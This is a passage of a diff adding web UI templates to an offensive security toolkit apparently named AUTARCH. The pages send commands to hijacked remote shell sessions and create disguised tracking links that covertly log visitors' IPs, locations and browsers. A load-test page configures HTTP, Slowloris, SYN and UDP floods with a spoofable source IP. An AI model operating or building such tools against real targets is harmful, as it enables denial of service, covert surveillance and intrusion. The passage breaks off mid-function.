document.getElementById('hh-shell').style.display='';
|
||||
document.getElementById('shell-target').textContent=label;
|
||||
const out=document.getElementById('shell-output');
|
||||
out.textContent=initial||'Connected. Type commands below.\n';
|
||||
document.getElementById('shell-input').focus();
|
||||
}
|
||||
|
||||
function shellExec(){
|
||||
if(!currentSessionId) return;
|
||||
const input=document.getElementById('shell-input');
|
||||
const cmd=input.value.trim();
|
||||
if(!cmd) return;
|
||||
input.value='';
|
||||
const out=document.getElementById('shell-output');
|
||||
out.textContent+='$ '+cmd+'\n';
|
||||
fetch('/hack-hijack/sessions/'+currentSessionId+'/exec',{
|
||||
method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({command:cmd})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(d.ok) out.textContent+=(d.output||'')+'\n';
|
||||
else out.textContent+='[error] '+(d.error||'failed')+'\n';
|
||||
out.scrollTop=out.scrollHeight;
|
||||
}).catch(e=>{out.textContent+='[error] '+e.message+'\n'});
|
||||
}
|
||||
|
||||
function closeCurrentSession(){
|
||||
if(!currentSessionId) return;
|
||||
fetch('/hack-hijack/sessions/'+currentSessionId,{method:'DELETE'})
|
||||
.then(r=>r.json()).then(()=>{
|
||||
document.getElementById('hh-shell').style.display='none';
|
||||
currentSessionId=null;
|
||||
loadSessions();
|
||||
});
|
||||
}
|
||||
|
||||
function loadHistory(){
|
||||
fetch('/hack-hijack/history').then(r=>r.json()).then(d=>{
|
||||
const list=document.getElementById('hh-history-list');
|
||||
const scans=d.scans||[];
|
||||
if(!scans.length){list.innerHTML='<div class="card" style="text-align:center;color:var(--text-muted)">No scan history</div>';return}
|
||||
list.innerHTML=scans.map(s=>{
|
||||
const highCount=(s.backdoors||[]).filter(b=>b.confidence==='high').length;
|
||||
const medCount=(s.backdoors||[]).filter(b=>b.confidence==='medium').length;
|
||||
return `<div class="card" style="margin-bottom:0.5rem;cursor:pointer" onclick='loadHistoryScan(${JSON.stringify(s).replace(/'/g,"'")})'>
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<div><strong>${esc(s.target)}</strong>
|
||||
— ${(s.open_ports||[]).length} ports,
|
||||
${(s.backdoors||[]).length} indicators
|
||||
${highCount?'<span class="conf-high">('+highCount+' HIGH)</span>':''}
|
||||
${medCount?'<span class="conf-medium">('+medCount+' MED)</span>':''}
|
||||
</div>
|
||||
<div style="font-size:0.75rem;color:var(--text-muted)">${(s.scan_time||'').slice(0,19)} — ${s.duration}s</div>
|
||||
</div></div>`;
|
||||
}).join('');
|
||||
});
|
||||
}
|
||||
|
||||
function loadHistoryScan(scan){
|
||||
currentScanResult=scan;
|
||||
renderResults(scan);
|
||||
switchTab('results');
|
||||
}
|
||||
|
||||
function clearHistory(){
|
||||
if(!confirm('Clear all scan history?')) return;
|
||||
fetch('/hack-hijack/history',{method:'DELETE'}).then(r=>r.json()).then(()=>loadHistory());
|
||||
}
|
||||
|
||||
function esc(s){return s?String(s).replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"'):''}
|
||||
</script>
|
||||
{% endblock %}
|
||||
233
web/templates/ipcapture.html
Normal file
233
web/templates/ipcapture.html
Normal file
@ -0,0 +1,233 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}IP Capture — AUTARCH{% endblock %}
|
||||
{% block content %}
|
||||
<h1>IP Capture & Redirect</h1>
|
||||
<p style="color:var(--text-secondary);margin-bottom:1.5rem">
|
||||
Create stealthy tracking links that capture visitor IP + metadata, then redirect to a legitimate site.
|
||||
</p>
|
||||
|
||||
<!-- Tabs -->
|
||||
<div class="tabs" style="display:flex;gap:0;border-bottom:2px solid var(--border);margin-bottom:1.5rem">
|
||||
<button class="tab-btn active" onclick="capTab('create',this)">Create & Manage</button>
|
||||
<button class="tab-btn" onclick="capTab('captures',this)">Captures</button>
|
||||
</div>
|
||||
|
||||
<!-- ═══════════════════ CREATE TAB ═══════════════════ -->
|
||||
<div id="tab-create" class="tab-pane">
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:1.25rem">
|
||||
<!-- Create link -->
|
||||
<div class="card" style="padding:1.25rem">
|
||||
<h3 style="margin-bottom:1rem">Create Capture Link</h3>
|
||||
<label class="form-label">Target URL (redirect destination)</label>
|
||||
<input id="cap-target" class="form-input" placeholder="https://example.com/real-article">
|
||||
|
||||
<label class="form-label" style="margin-top:0.5rem">Friendly Name</label>
|
||||
<input id="cap-name" class="form-input" placeholder="Phishing awareness test #1">
|
||||
|
||||
<label class="form-label" style="margin-top:0.5rem">Disguise Type</label>
|
||||
<select id="cap-disguise" class="form-input">
|
||||
<option value="article">Article URL (realistic path)</option>
|
||||
<option value="short">Short URL (/c/xxxxx)</option>
|
||||
</select>
|
||||
|
||||
<button class="btn btn-primary" style="margin-top:1rem;width:100%" onclick="createCapLink()">Create Link</button>
|
||||
|
||||
<!-- Result -->
|
||||
<div id="cap-result" style="display:none;margin-top:1rem;background:var(--bg-input);border:1px solid var(--border);border-radius:var(--radius);padding:1rem">
|
||||
<div style="font-size:0.82rem;color:var(--text-secondary);margin-bottom:0.5rem">Your tracking links:</div>
|
||||
<div style="margin-bottom:0.4rem">
|
||||
<label style="font-size:0.72rem;color:var(--text-muted)">SHORT URL</label>
|
||||
<div style="display:flex;gap:0.4rem;align-items:center">
|
||||
<input id="cap-res-short" class="form-input" readonly style="font-family:monospace;font-size:0.82rem">
|
||||
<button class="btn btn-small" onclick="copyUrl('cap-res-short')">Copy</button>
|
||||
</div>
|
||||
</div>
|
||||
<div>
|
||||
<label style="font-size:0.72rem;color:var(--text-muted)">ARTICLE URL</label>
|
||||
<div style="display:flex;gap:0.4rem;align-items:center">
|
||||
<input id="cap-res-article" class="form-input" readonly style="font-family:monospace;font-size:0.82rem">
|
||||
<button class="btn btn-small" onclick="copyUrl('cap-res-article')">Copy</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Active links -->
|
||||
<div class="card" style="padding:1.25rem">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:1rem">
|
||||
<h3>Active Links</h3>
|
||||
<button class="btn btn-small" onclick="loadCapLinks()">Refresh</button>
|
||||
</div>
|
||||
<div id="cap-links" style="font-size:0.85rem">Loading...</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ═══════════════════ CAPTURES TAB ═══════════════════ -->
|
||||
<div id="tab-captures" class="tab-pane" style="display:none">
|
||||
<div class="card" style="padding:1.25rem">
|
||||
<div style="display:flex;align-items:center;gap:0.75rem;margin-bottom:1rem">
|
||||
<h3>Captures for:</h3>
|
||||
<select id="cap-select" class="form-input" style="width:auto;min-width:250px" onchange="loadCaptures()"></select>
|
||||
<button class="btn btn-small" onclick="loadCaptures()">Refresh</button>
|
||||
<div style="margin-left:auto;display:flex;gap:0.4rem">
|
||||
<button class="btn btn-small" onclick="exportCap('json')">Export JSON</button>
|
||||
<button class="btn btn-small" onclick="exportCap('csv')">Export CSV</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div id="cap-stats" style="display:flex;gap:1.5rem;margin-bottom:1rem;font-size:0.9rem"></div>
|
||||
|
||||
<table style="width:100%;font-size:0.82rem;border-collapse:collapse">
|
||||
<thead>
|
||||
<tr style="border-bottom:2px solid var(--border);text-align:left">
|
||||
<th style="padding:6px">IP</th>
|
||||
<th style="padding:6px">Timestamp</th>
|
||||
<th style="padding:6px">Location</th>
|
||||
<th style="padding:6px">User Agent</th>
|
||||
<th style="padding:6px">Language</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="cap-table"></tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<style>
|
||||
.tab-btn{padding:0.6rem 1.2rem;background:none;border:none;color:var(--text-secondary);cursor:pointer;font-size:0.9rem;border-bottom:2px solid transparent;margin-bottom:-2px;transition:all 0.2s}
|
||||
.tab-btn:hover{color:var(--text-primary)}
|
||||
.tab-btn.active{color:var(--accent);border-bottom-color:var(--accent);font-weight:600}
|
||||
.form-label{display:block;font-size:0.78rem;color:var(--text-secondary);margin-bottom:0.25rem;font-weight:600;text-transform:uppercase;letter-spacing:0.04em}
|
||||
.form-input{width:100%;padding:0.5rem 0.65rem;background:var(--bg-input);border:1px solid var(--border);border-radius:var(--radius);color:var(--text-primary);font-size:0.85rem}
|
||||
.form-input:focus{outline:none;border-color:var(--accent)}
|
||||
.btn-danger{background:var(--danger);color:#fff}
|
||||
.link-card{background:var(--bg-input);border:1px solid var(--border);border-radius:var(--radius);padding:0.75rem;margin-bottom:0.5rem}
|
||||
.link-card:hover{border-color:var(--accent)}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
let _currentCapKey = '';
|
||||
|
||||
function capTab(name, btn) {
|
||||
document.querySelectorAll('.tab-pane').forEach(p => p.style.display = 'none');
|
||||
document.querySelectorAll('.tab-btn').forEach(b => b.classList.remove('active'));
|
||||
document.getElementById('tab-' + name).style.display = '';
|
||||
btn.classList.add('active');
|
||||
if (name === 'captures') { loadCapSelect(); loadCaptures(); }
|
||||
}
|
||||
|
||||
function copyUrl(id) {
|
||||
const el = document.getElementById(id);
|
||||
el.select();
|
||||
document.execCommand('copy');
|
||||
}
|
||||
|
||||
// ── Create ──
|
||||
function createCapLink() {
|
||||
const data = {
|
||||
target_url: document.getElementById('cap-target').value,
|
||||
name: document.getElementById('cap-name').value,
|
||||
disguise: document.getElementById('cap-disguise').value,
|
||||
};
|
||||
fetch('/ipcapture/links', {method:'POST', headers:{'Content-Type':'application/json'}, body:JSON.stringify(data)})
|
||||
.then(r => r.json()).then(d => {
|
||||
if (d.ok) {
|
||||
const base = window.location.origin;
|
||||
document.getElementById('cap-res-short').value = base + d.short_path;
|
||||
document.getElementById('cap-res-article').value = base + d.article_path;
|
||||
document.getElementById('cap-result').style.display = '';
|
||||
loadCapLinks();
|
||||
} else {
|
||||
alert(d.error);
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
// ── Links ──
|
||||
function loadCapLinks() {
|
||||
fetch('/ipcapture/links').then(r => r.json()).then(d => {
|
||||
const el = document.getElementById('cap-links');
|
||||
if (!d.ok || !d.links.length) { el.textContent = 'No links created yet'; return; }
|
||||
el.innerHTML = d.links.map(l => {
|
||||
const s = l.stats || {};
|
||||
return `<div class="link-card">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<strong>${l.name || l.key}</strong>
|
||||
<span style="font-size:0.78rem;color:var(--text-muted)">${s.total || 0} captures (${s.unique_ips || 0} unique)</span>
|
||||
</div>
|
||||
<div style="font-size:0.78rem;color:var(--text-secondary);margin-top:0.3rem">
|
||||
Target: <a href="${l.target_url}" target="_blank" style="color:var(--accent)">${l.target_url.substring(0,60)}${l.target_url.length > 60 ? '...' : ''}</a>
|
||||
</div>
|
||||
<div style="font-size:0.75rem;font-family:monospace;color:var(--text-muted);margin-top:0.2rem">
|
||||
${l.short_path} • ${l.article_path || ''}
|
||||
</div>
|
||||
<div style="margin-top:0.5rem;display:flex;gap:0.4rem">
|
||||
<button class="btn btn-small" onclick="_currentCapKey='${l.key}';capTab('captures',document.querySelectorAll('.tab-btn')[1])">View Captures</button>
|
||||
<button class="btn btn-small btn-danger" onclick="deleteCapLink('${l.key}')">Delete</button>
|
||||
</div>
|
||||
</div>`;
|
||||
}).join('');
|
||||
});
|
||||
}
|
||||
|
||||
function deleteCapLink(key) {
|
||||
if (!confirm('Delete this capture link?')) return;
|
||||
fetch(`/ipcapture/links/${key}`, {method:'DELETE'}).then(() => loadCapLinks());
|
||||
}
|
||||
|
||||
// ── Captures ──
|
||||
function loadCapSelect() {
|
||||
fetch('/ipcapture/links').then(r => r.json()).then(d => {
|
||||
const sel = document.getElementById('cap-select');
|
||||
if (!d.ok || !d.links.length) { sel.innerHTML = '<option>No links</option>'; return; }
|
||||
sel.innerHTML = d.links.map(l => `<option value="${l.key}">${l.name || l.key} (${(l.stats||{}).total||0} captures)</option>`).join('');
|
||||
if (_currentCapKey) sel.value = _currentCapKey;
|
||||
});
|
||||
}
|
||||
|
||||
function loadCaptures() {
|
||||
const key = document.getElementById('cap-select').value || _currentCapKey;
|
||||
if (!key) return;
|
||||
_currentCapKey = key;
|
||||
fetch(`/ipcapture/links/${key}`).then(r => r.json()).then(d => {
|
||||
if (!d.ok) return;
|
||||
const link = d.link;
|
||||
const s = link.stats || {};
|
||||
|
||||
document.getElementById('cap-stats').innerHTML =
|
||||
`<span>Total: <strong>${s.total||0}</strong></span>
|
||||
<span>Unique IPs: <strong>${s.unique_ips||0}</strong></span>
|
||||
<span style="color:var(--text-muted)">First: ${s.first ? new Date(s.first).toLocaleString() : '—'}</span>
|
||||
<span style="color:var(--text-muted)">Last: ${s.last ? new Date(s.last).toLocaleString() : '—'}</span>`;
|
||||
|
||||
const captures = link.captures || [];
|
||||
const el = document.getElementById('cap-table');
|
||||
if (!captures.length) {
|
||||
el.innerHTML = '<tr><td colspan="5" style="padding:10px;color:var(--text-muted)">No captures yet. Share your link and wait for clicks.</td></tr>';
|
||||
return;
|
||||
}
|
||||
el.innerHTML = captures.map(c => {
|
||||
const geo = c.geo || {};
|
||||
const loc = geo.city ? `${geo.city}, ${geo.country}` : (geo.country || 'Unknown');
|
||||
const ua = (c.user_agent || '').substring(0, 60) + ((c.user_agent||'').length > 60 ? '...' : '');
|
||||
return `<tr style="border-bottom:1px solid var(--border)">
|
||||
<td style="padding:5px;font-family:monospace;font-weight:600">${c.ip}</td>
|
||||
<td style="padding:5px;font-size:0.78rem">${new Date(c.timestamp).toLocaleString()}</td>
|
||||
<td style="padding:5px">${loc}</td>
|
||||
<td style="padding:5px;font-size:0.75rem;max-width:250px;overflow:hidden;text-overflow:ellipsis" title="${c.user_agent||''}">${ua}</td>
|
||||
<td style="padding:5px;font-size:0.75rem">${c.accept_language || ''}</td>
|
||||
</tr>`;
|
||||
}).join('');
|
||||
});
|
||||
}
|
||||
|
||||
function exportCap(fmt) {
|
||||
const key = _currentCapKey || document.getElementById('cap-select').value;
|
||||
if (!key) return;
|
||||
window.open(`/ipcapture/links/${key}/export?format=${fmt}`, '_blank');
|
||||
}
|
||||
|
||||
// Init
|
||||
document.addEventListener('DOMContentLoaded', loadCapLinks);
|
||||
</script>
|
||||
{% endblock %}
|
||||
457
web/templates/loadtest.html
Normal file
457
web/templates/loadtest.html
Normal file
@ -0,0 +1,457 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}Load Test - AUTARCH{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Load Testing</h1>
|
||||
</div>
|
||||
|
||||
<!-- Test Controls -->
|
||||
<div class="section" id="controls-section">
|
||||
<h2>Test Configuration</h2>
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="lt-type" data-tab="http" onclick="showTab('lt-type','http')">HTTP Flood</button>
|
||||
<button class="tab" data-tab-group="lt-type" data-tab="slowloris" onclick="showTab('lt-type','slowloris')">Slowloris</button>
|
||||
<button class="tab" data-tab-group="lt-type" data-tab="tcp" onclick="showTab('lt-type','tcp')">TCP Connect</button>
|
||||
<button class="tab" data-tab-group="lt-type" data-tab="syn" onclick="showTab('lt-type','syn')">SYN Flood</button>
|
||||
<button class="tab" data-tab-group="lt-type" data-tab="udp" onclick="showTab('lt-type','udp')">UDP Flood</button>
|
||||
</div>
|
||||
|
||||
<!-- HTTP Flood -->
|
||||
<div class="tab-content active" data-tab-group="lt-type" data-tab="http">
|
||||
<div style="display:grid;grid-template-columns:1fr auto;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-target">Target URL</label>
|
||||
<input type="text" id="lt-target" placeholder="https://example.com/api/endpoint">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-method">Method</label>
|
||||
<select id="lt-method" style="width:90px">
|
||||
<option value="GET">GET</option>
|
||||
<option value="POST">POST</option>
|
||||
<option value="PUT">PUT</option>
|
||||
<option value="DELETE">DELETE</option>
|
||||
<option value="HEAD">HEAD</option>
|
||||
<option value="PATCH">PATCH</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group" style="margin-top:0.5rem">
|
||||
<label for="lt-headers">Custom Headers (JSON)</label>
|
||||
<input type="text" id="lt-headers" placeholder='{"Authorization":"Bearer token","Content-Type":"application/json"}'>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label for="lt-body">Request Body</label>
|
||||
<input type="text" id="lt-body" placeholder='{"key":"value"} or form data'>
|
||||
</div>
|
||||
<div style="display:flex;gap:0.75rem;flex-wrap:wrap">
|
||||
<label style="font-size:0.85rem;display:flex;align-items:center;gap:0.3rem;cursor:pointer">
|
||||
<input type="checkbox" id="lt-follow-redirects" checked> Follow redirects
|
||||
</label>
|
||||
<label style="font-size:0.85rem;display:flex;align-items:center;gap:0.3rem;cursor:pointer">
|
||||
<input type="checkbox" id="lt-verify-ssl"> Verify SSL
|
||||
</label>
|
||||
<label style="font-size:0.85rem;display:flex;align-items:center;gap:0.3rem;cursor:pointer">
|
||||
<input type="checkbox" id="lt-rotate-ua" checked> Rotate User-Agents
|
||||
</label>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Slowloris -->
|
||||
<div class="tab-content" data-tab-group="lt-type" data-tab="slowloris">
|
||||
<div style="margin-top:0.75rem">
|
||||
<div class="form-group">
|
||||
<label for="lt-slowloris-target">Target URL or host:port</label>
|
||||
<input type="text" id="lt-slowloris-target" placeholder="https://example.com or 192.168.1.1:80">
|
||||
</div>
|
||||
</div>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted)">Slowloris holds connections open with partial HTTP headers, exhausting the target's connection pool. Each worker manages ~50 sockets.</p>
|
||||
</div>
|
||||
|
||||
<!-- TCP Connect -->
|
||||
<div class="tab-content" data-tab-group="lt-type" data-tab="tcp">
|
||||
<div style="display:grid;grid-template-columns:1fr auto;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-tcp-target">Target (host:port)</label>
|
||||
<input type="text" id="lt-tcp-target" placeholder="192.168.1.1:80">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-tcp-payload">Payload (bytes)</label>
|
||||
<input type="number" id="lt-tcp-payload" value="0" style="width:90px" min="0" max="65535">
|
||||
</div>
|
||||
</div>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-top:0.5rem">Rapid TCP connect/disconnect to exhaust server resources. Set payload > 0 to send random data per connection.</p>
|
||||
</div>
|
||||
|
||||
<!-- SYN Flood -->
|
||||
<div class="tab-content" data-tab-group="lt-type" data-tab="syn">
|
||||
<div style="display:grid;grid-template-columns:1fr auto;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-syn-target">Target (host:port)</label>
|
||||
<input type="text" id="lt-syn-target" placeholder="192.168.1.1:80">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-syn-srcip">Source IP (optional)</label>
|
||||
<input type="text" id="lt-syn-srcip" placeholder="auto-detect" style="width:140px">
|
||||
</div>
|
||||
</div>
|
||||
<p style="font-size:0.8rem;color:var(--warning);margin-top:0.5rem">Requires administrator/root privileges for raw sockets. Falls back to TCP connect flood without admin.</p>
|
||||
</div>
|
||||
|
||||
<!-- UDP Flood -->
|
||||
<div class="tab-content" data-tab-group="lt-type" data-tab="udp">
|
||||
<div style="display:grid;grid-template-columns:1fr auto;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-udp-target">Target (host:port)</label>
|
||||
<input type="text" id="lt-udp-target" placeholder="192.168.1.1:53">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-udp-payload">Payload (bytes)</label>
|
||||
<input type="number" id="lt-udp-payload" value="1024" style="width:90px" min="1" max="65535">
|
||||
</div>
|
||||
</div>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-top:0.5rem">Sends UDP packets at maximum rate. Effective against UDP services (DNS, NTP, etc.).</p>
|
||||
</div>
|
||||
|
||||
<!-- Common settings -->
|
||||
<div style="margin-top:1rem;padding-top:0.75rem;border-top:1px solid var(--border)">
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr 1fr 1fr;gap:0.75rem;align-items:end">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-workers">Workers</label>
|
||||
<input type="number" id="lt-workers" value="10" min="1" max="500">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-duration">Duration (s)</label>
|
||||
<input type="number" id="lt-duration" value="30" min="0">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-ramp">Ramp Pattern</label>
|
||||
<select id="lt-ramp">
|
||||
<option value="constant">Constant</option>
|
||||
<option value="linear">Linear Ramp</option>
|
||||
<option value="step">Step</option>
|
||||
<option value="spike">Spike</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-ramp-dur">Ramp Time (s)</label>
|
||||
<input type="number" id="lt-ramp-dur" value="0" min="0">
|
||||
</div>
|
||||
</div>
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr 1fr 1fr;gap:0.75rem;align-items:end;margin-top:0.5rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-rate">Rate Limit (req/s)</label>
|
||||
<input type="number" id="lt-rate" value="0" min="0" placeholder="0 = unlimited">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-timeout">Timeout (s)</label>
|
||||
<input type="number" id="lt-timeout" value="10" min="1">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="lt-max-req">Max Req/Worker</label>
|
||||
<input type="number" id="lt-max-req" value="0" min="0" placeholder="0 = unlimited">
|
||||
</div>
|
||||
<div></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Launch controls -->
|
||||
<div class="tool-actions" style="margin-top:1rem">
|
||||
<button id="btn-start" class="btn btn-danger" onclick="startTest()">Start Test</button>
|
||||
<button id="btn-pause" class="btn btn-secondary" onclick="pauseTest()" style="display:none">Pause</button>
|
||||
<button id="btn-resume" class="btn btn-primary" onclick="resumeTest()" style="display:none">Resume</button>
|
||||
<button id="btn-stop" class="btn btn-secondary" onclick="stopTest()" style="display:none">Stop</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Live Dashboard -->
|
||||
<div class="section" id="dashboard-section" style="display:none">
|
||||
<h2>Live Metrics</h2>
|
||||
<div style="display:grid;grid-template-columns:repeat(4, 1fr);gap:0.75rem">
|
||||
<div class="card" style="text-align:center">
|
||||
<div style="font-size:1.8rem;font-weight:700;color:var(--accent)" id="m-rps">0</div>
|
||||
<div style="font-size:0.75rem;color:var(--text-muted)">Requests/sec</div>
|
||||
</div>
|
||||
<div class="card" style="text-align:center">
|
||||
<div style="font-size:1.8rem;font-weight:700" id="m-total">0</div>
|
||||
<div style="font-size:0.75rem;color:var(--text-muted)">Total Requests</div>
|
||||
</div>
|
||||
<div class="card" style="text-align:center">
|
||||
<div style="font-size:1.8rem;font-weight:700;color:var(--success)" id="m-success">0%</div>
|
||||
<div style="font-size:0.75rem;color:var(--text-muted)">Success Rate</div>
|
||||
</div>
|
||||
<div class="card" style="text-align:center">
|
||||
<div style="font-size:1.8rem;font-weight:700;color:var(--warning)" id="m-avg-latency">0ms</div>
|
||||
<div style="font-size:0.75rem;color:var(--text-muted)">Avg Latency</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Detail metrics -->
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.75rem;margin-top:0.75rem">
|
||||
<div class="card">
|
||||
<h3 style="margin:0 0 0.5rem 0;font-size:0.9rem">Performance</h3>
|
||||
<table style="width:100%;font-size:0.85rem">
|
||||
<tr><td style="color:var(--text-muted)">Workers</td><td id="m-workers" style="text-align:right">0</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">Elapsed</td><td id="m-elapsed" style="text-align:right">0s</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">Successful</td><td id="m-ok" style="text-align:right;color:var(--success)">0</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">Failed</td><td id="m-fail" style="text-align:right;color:var(--error)">0</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">Data Sent</td><td id="m-sent" style="text-align:right">0</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">Data Recv</td><td id="m-recv" style="text-align:right">0</td></tr>
|
||||
</table>
|
||||
</div>
|
||||
<div class="card">
|
||||
<h3 style="margin:0 0 0.5rem 0;font-size:0.9rem">Latency Percentiles</h3>
|
||||
<table style="width:100%;font-size:0.85rem">
|
||||
<tr><td style="color:var(--text-muted)">Min</td><td id="m-p-min" style="text-align:right">0ms</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">P50 (Median)</td><td id="m-p50" style="text-align:right">0ms</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">P95</td><td id="m-p95" style="text-align:right">0ms</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">P99</td><td id="m-p99" style="text-align:right">0ms</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">Max</td><td id="m-p-max" style="text-align:right">0ms</td></tr>
|
||||
<tr><td style="color:var(--text-muted)">Error Rate</td><td id="m-err-rate" style="text-align:right">0%</td></tr>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- RPS chart (ASCII-style bar chart) -->
|
||||
<div class="card" style="margin-top:0.75rem">
|
||||
<h3 style="margin:0 0 0.5rem 0;font-size:0.9rem">RPS Over Time</h3>
|
||||
<div id="rps-chart" style="height:80px;display:flex;align-items:flex-end;gap:1px;overflow:hidden"></div>
|
||||
</div>
|
||||
|
||||
<!-- Status codes & errors -->
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.75rem;margin-top:0.75rem">
|
||||
<div class="card">
|
||||
<h3 style="margin:0 0 0.5rem 0;font-size:0.9rem">Status Codes</h3>
|
||||
<div id="m-status-codes" style="font-size:0.85rem"><span style="color:var(--text-muted)">—</span></div>
|
||||
</div>
|
||||
<div class="card">
|
||||
<h3 style="margin:0 0 0.5rem 0;font-size:0.9rem">Top Errors</h3>
|
||||
<div id="m-errors" style="font-size:0.85rem"><span style="color:var(--text-muted)">—</span></div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Presets -->
|
||||
<div class="section">
|
||||
<h2>Quick Presets</h2>
|
||||
<div style="display:grid;grid-template-columns:repeat(3, 1fr);gap:0.75rem">
|
||||
<button class="btn btn-small" onclick="applyPreset('gentle')">Gentle (5w / 10s)</button>
|
||||
<button class="btn btn-small" onclick="applyPreset('moderate')">Moderate (25w / 30s)</button>
|
||||
<button class="btn btn-small" onclick="applyPreset('heavy')">Heavy (100w / 60s)</button>
|
||||
<button class="btn btn-small" onclick="applyPreset('stress')">Stress (250w / 120s)</button>
|
||||
<button class="btn btn-small" onclick="applyPreset('ramp')">Linear Ramp (50w / 60s)</button>
|
||||
<button class="btn btn-small" onclick="applyPreset('spike')">Spike Test (100w / 30s)</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
let _ltEventSource = null;
|
||||
let _ltPollTimer = null;
|
||||
|
||||
function _v(id) { const el = document.getElementById(id); return el ? el.value.trim() : ''; }
|
||||
|
||||
function _getActiveAttackType() {
|
||||
const tabs = document.querySelectorAll('[data-tab-group="lt-type"].tab-content');
|
||||
for (const t of tabs) {
|
||||
if (t.classList.contains('active')) return t.dataset.tab;
|
||||
}
|
||||
return 'http';
|
||||
}
|
||||
|
||||
function _buildConfig() {
|
||||
const type = _getActiveAttackType();
|
||||
const config = {
|
||||
workers: parseInt(_v('lt-workers')) || 10,
|
||||
duration: parseInt(_v('lt-duration')) || 30,
|
||||
ramp_pattern: _v('lt-ramp') || 'constant',
|
||||
ramp_duration: parseInt(_v('lt-ramp-dur')) || 0,
|
||||
rate_limit: parseInt(_v('lt-rate')) || 0,
|
||||
timeout: parseInt(_v('lt-timeout')) || 10,
|
||||
requests_per_worker: parseInt(_v('lt-max-req')) || 0,
|
||||
};
|
||||
|
||||
if (type === 'http') {
|
||||
config.attack_type = 'http_flood';
|
||||
config.target = _v('lt-target');
|
||||
config.method = _v('lt-method') || 'GET';
|
||||
config.body = _v('lt-body') || '';
|
||||
config.follow_redirects = document.getElementById('lt-follow-redirects').checked;
|
||||
config.verify_ssl = document.getElementById('lt-verify-ssl').checked;
|
||||
config.rotate_useragent = document.getElementById('lt-rotate-ua').checked;
|
||||
try { config.headers = JSON.parse(_v('lt-headers') || '{}'); } catch(e) { config.headers = {}; }
|
||||
} else if (type === 'slowloris') {
|
||||
config.attack_type = 'slowloris';
|
||||
config.target = _v('lt-slowloris-target');
|
||||
} else if (type === 'tcp') {
|
||||
config.attack_type = 'tcp_connect';
|
||||
config.target = _v('lt-tcp-target');
|
||||
config.payload_size = parseInt(_v('lt-tcp-payload')) || 0;
|
||||
} else if (type === 'syn') {
|
||||
config.attack_type = 'syn_flood';
|
||||
config.target = _v('lt-syn-target');
|
||||
config.source_ip = _v('lt-syn-srcip') || '';
|
||||
} else if (type === 'udp') {
|
||||
config.attack_type = 'udp_flood';
|
||||
